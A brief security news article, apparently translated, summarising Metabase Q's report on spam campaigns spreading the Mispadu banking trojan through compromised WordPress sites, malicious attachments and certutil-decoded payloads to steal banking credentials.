One trojan - from one email to loss of funds.
Security company Metabase Q reports that the operators of the banking Trojan Mispadu are running several spam campaigns in Bolivia, Chile, Mexico, Peru and Portugal and other countries to steal credentials and deliver other malware.
According to experts, the campaign began in August 2022. The Mispadu Trojan (URSA) was first documented by ESET in November 2019. Then the researchers identified its ability to steal funds and credentials, as well as take screenshots and intercept keystrokes.
One of their main strategies for infecting Mispadu is:
compromise vulnerable WordPress sites;
turning them into a command and control server (C2);
spreading malware from a C2 server,
filtering countries that cannot be infected.
The chain of attacks includes emails urging the recipient to open fake delinquent accounts. When a victim opens an HTML attachment, Mispadu checks that the file was opened from a desktop computer and then redirects the victim to a remote server to download the malicious archive.
The RAR or ZIP archive uses fake digital certificates, one of which is Mispadu malware and the other is the AutoIT installer to decode and run the Trojan using the legitimate command line utility certutil .
Mispadu allows you to collect a list of installed antivirus solutions, intercept credentials from Google Chrome and Microsoft Outlook, and download additional malware, including an obfuscated VBS dropper designed to deliver payloads from a hard-coded domain. The delivered payload is:
a .NET-based remote access tool that can execute commands received from a C2 server;
a loader written in Rust that runs a PowerShell loader to run files directly from memory.
Moreover, the malware uses an overlay to obtain online banking credentials and other sensitive information.
Metabase Q noted that the use of "certutil" allowed Mispadu to bypass detection by a wide range of antiviruses and collect over 90,000 online banking credentials from over 17,500 unique websites.